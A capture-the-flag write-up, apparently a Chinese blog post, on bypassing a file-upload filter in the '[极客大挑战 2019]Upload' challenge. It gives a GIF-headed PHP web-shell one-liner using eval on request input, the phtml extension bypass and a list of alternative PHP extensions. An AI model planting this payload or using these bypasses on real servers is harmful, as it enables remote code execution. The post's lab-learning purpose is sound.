[极客大挑战 2019]Upload 1

前言

这真的是一道挺简单的题目,就是进行内容和后缀的绕过,但是我这里出了一点问题。我是用了一个png图片,直接往后面放一句话,之前的做一道文件上传的时候用的挺好的,这题发现不行。不知道是题目过滤了png图片头还是那张图片的问题。
因此去查了查WP,看了一下别的师傅的图片马的头部都是什么样的,然后就过了。

WP

这题的绕过点有三个,一个就是文件内容不能有<?,还有就是文件后缀的绕过,还有图片头。
因此图片内容如下:

GIF89a? <script language="php">eval($_REQUEST[feng])</script>

后缀的话可以用phtml来绕过。
还有一个问题就是上传之后的文件在哪。猜测还是常规的目录/upload下面,用蚁剑连成功了,确实是在upload下面。

附常见的php后缀:
php2, php3, php4, php5, phps, pht, phtm, phtml

  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值